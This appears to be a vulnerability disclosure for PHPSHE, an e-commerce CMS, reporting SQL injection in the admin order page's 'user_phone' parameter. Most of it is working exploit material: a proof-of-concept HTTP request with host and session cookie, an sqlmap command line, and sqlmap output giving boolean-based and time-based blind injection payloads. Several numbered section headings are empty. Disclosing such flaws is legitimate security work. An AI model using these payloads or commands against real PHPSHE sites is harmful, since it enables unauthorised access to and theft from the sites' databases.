代码拉取完成,页面将自动刷新
1.admin index.php

2.vulnerability point

3.code

4.capture the cap

5.sql injection test

poc:
GET /phpshe/admin.php?mod=order&state=&id=1&user_tname=1&user_phone=1&date1=2018-12-26&date2= HTTP/1.1
Host: 192.3.221.177
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.3.221.177/phpshe/admin.php?mod=order
Cookie: deviceid=1545098043964; PHPSESSID=d7860vsq3q03c2pvmvc798tt64
Connection: close
sqlmap command:
Python sqlmap.py -r 1.txt --level=3 --risk=2 --dbms=mysql --batch -p "user_phone"
injection type:
---
Parameter: user_phone (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
clause
Payload: mod=order&state=&id=1&user_tname=1&user_phone=1' RLIKE (SELECT (CAS
E WHEN (4784=4784) THEN 1 ELSE 0x28 END))-- EfBd&date1=2018-12-26&date2=
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: mod=order&state=&id=1&user_tname=1&user_phone=1' AND (SELECT * FROM
(SELECT(SLEEP(5)))hxbT)-- YEPD&date1=2018-12-26&date2=
---